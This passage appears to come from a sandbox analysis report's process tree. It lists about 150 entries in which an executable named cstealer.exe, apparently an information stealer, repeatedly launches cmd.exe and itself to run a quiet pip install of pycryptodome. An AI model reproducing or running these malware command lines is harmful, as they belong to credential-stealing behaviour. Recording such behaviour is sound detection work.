        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        191⤵
        
        PID:11808
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        192⤵
        
        PID:10664
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet"
        193⤵
        
        PID:10752
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        194⤵
        
        PID:11040
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        195⤵
        
        PID:10108
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet"
        196⤵
        
        PID:9632
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        197⤵
        
        PID:11360
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        198⤵
        
        PID:11612
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet"
        199⤵
        
        PID:11796
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        200⤵
        
        PID:11924
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        201⤵
        
        PID:10172
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet"
        202⤵
        
        PID:12464
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        203⤵
        
        PID:12536
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        204⤵
        
        PID:12900
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet"
        205⤵
        
        PID:13000
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        206⤵
        
        PID:13160
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        207⤵
        
        PID:11544
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet"
        208⤵
        
        PID:10192
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        209⤵
        
        PID:13352
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        210⤵
        
        PID:13736
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet"
        211⤵
        
        PID:13768
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        212⤵
        
        PID:13940
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        213⤵
        
        PID:14324
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet"
        214⤵
        
        PID:9556
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        215⤵
        
        PID:10324
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        216⤵
        
        PID:12152
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet"
        217⤵
        
        PID:12460
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        218⤵
        
        PID:10716
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        219⤵
        
        PID:11204
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet"
        220⤵
        
        PID:9800
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        221⤵
        
        PID:11456
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        222⤵
        
        PID:12000
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet"
        223⤵
        
        PID:12116
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        224⤵
        
        PID:12416
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        225⤵
        
        PID:12852
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet"
        226⤵
        
        PID:12928
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        227⤵
        
        PID:13272
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        228⤵
        
        PID:12396
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet"
        229⤵
        
        PID:4172
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        230⤵
        
        PID:14020
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        231⤵
        
        PID:7304
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet"
        232⤵
        
        PID:9536
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        233⤵
        
        PID:9924
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        234⤵
        
        PID:3324
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet"
        235⤵
        
        PID:11004
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        236⤵
        
        PID:11208
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        237⤵
        
        PID:11576
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet"
        238⤵
        
        PID:11964
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        239⤵
        
        PID:12204
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        240⤵
        
        PID:12804
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet"
        241⤵
        
        PID:14084
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        242⤵
        
        PID:10228
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        243⤵
        
        PID:13528
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet"
        244⤵
        
        PID:13728
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        245⤵
        
        PID:13924
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        246⤵
        
        PID:10292
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet"
        247⤵
        
        PID:13064
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        248⤵
        
        PID:11084
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        249⤵
        
        PID:11492
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet"
        250⤵
        
        PID:11804
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        251⤵
        
        PID:12620
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        252⤵
        
        PID:6644
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet"
        253⤵
        
        PID:12256
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        254⤵
        
        PID:13436
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        255⤵
        
        PID:9492
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet"
        256⤵
        
        PID:10468
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        257⤵
        
        PID:9972
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        258⤵
        
        PID:12660
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet"
        259⤵
        
        PID:14116
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        260⤵
        
        PID:13396
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        261⤵
        
        PID:7736
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet"
        262⤵
        
        PID:11344
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        263⤵
        
        PID:11780
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        264⤵
        
        PID:13428
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet"
        265⤵
        
        PID:6112
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        266⤵
        
        PID:8600
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        267⤵
        
        PID:8960
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet"
        268⤵
        
        PID:12664
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        269⤵
        
        PID:12788
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        270⤵
        
        PID:8348
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet"
        271⤵
        
        PID:13784
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        272⤵
        
        PID:11988
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        273⤵
        
        PID:14444
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet"
        274⤵
        
        PID:14520
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        275⤵
        
        PID:14596
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        276⤵
        
        PID:14760
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet"
        277⤵
        
        PID:14836
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        278⤵
        
        PID:14920
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        279⤵
        
        PID:15084
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet"
        280⤵
        
        PID:15188
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        281⤵
        
        PID:15232
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        282⤵
        
        PID:14424
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet"
        283⤵
        
        PID:14640
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        284⤵
        
        PID:14716
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        285⤵
        
        PID:15040
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet"
        286⤵
        
        PID:15180
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        287⤵
        
        PID:14168
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        288⤵
        
        PID:7216
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet"
        289⤵
        
        PID:14612
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        290⤵
        
        PID:15024
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        291⤵
        
        PID:10808
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet"
        292⤵
        
        PID:8360
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        293⤵
        
        PID:15300
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        294⤵
        
        PID:9844
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet"
        295⤵
        
        PID:14420
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        296⤵
        
        PID:14480
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        297⤵
        
        PID:14364
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet"
        298⤵
        
        PID:640
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        299⤵
        
        PID:11944
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        300⤵
        
        PID:14968
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet"
        301⤵
        
        PID:15008
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        302⤵
        
        PID:15080
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        303⤵
        
        PID:8028
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet"
        304⤵
        
        PID:15344
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        305⤵
        
        PID:14396
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        306⤵
        
        PID:14548
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet"
        307⤵
        
        PID:14476
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        308⤵
        
        PID:8676
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        309⤵
        
        PID:15128
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet"
        310⤵
        
        PID:9068
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        311⤵
        
        PID:8968
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        312⤵
        
        PID:2596
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet"
        313⤵
        
        PID:1912
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        314⤵
        
        PID:8940
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        315⤵
        
        PID:9124
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet"
        316⤵
        
        PID:6444
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        317⤵
        
        PID:14652
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        318⤵
        
        PID:7276
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet"
        319⤵
        
        PID:14508
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        320⤵
        
        PID:5056
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        321⤵
        
        PID:7132
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet"
        322⤵
        
        PID:4980
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        323⤵
        
        PID:4388
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        324⤵
        
        PID:376
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet"
        325⤵
        
        PID:5032
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        326⤵
        
        PID:1456
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        327⤵
        
        PID:15468
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet"
        328⤵
        
        PID:15532
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        329⤵
        
        PID:15592
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        330⤵
        
        PID:15724
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet"
        331⤵
        
        PID:15792
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        332⤵
        
        PID:15852
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        333⤵
        
        PID:15960
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet"
        334⤵
        
        PID:16012
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        335⤵
        
        PID:16072
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        336⤵
        
        PID:16172
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet"
        337⤵
        
        PID:16220
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        338⤵
        
        PID:16272
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        339⤵
        
        PID:15388
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet"
        340⤵
        
        PID:15420
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        341⤵
        
        PID:15496
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        342⤵
        
        PID:15672
        
        C:\Windows\system32\cmd.exe
        
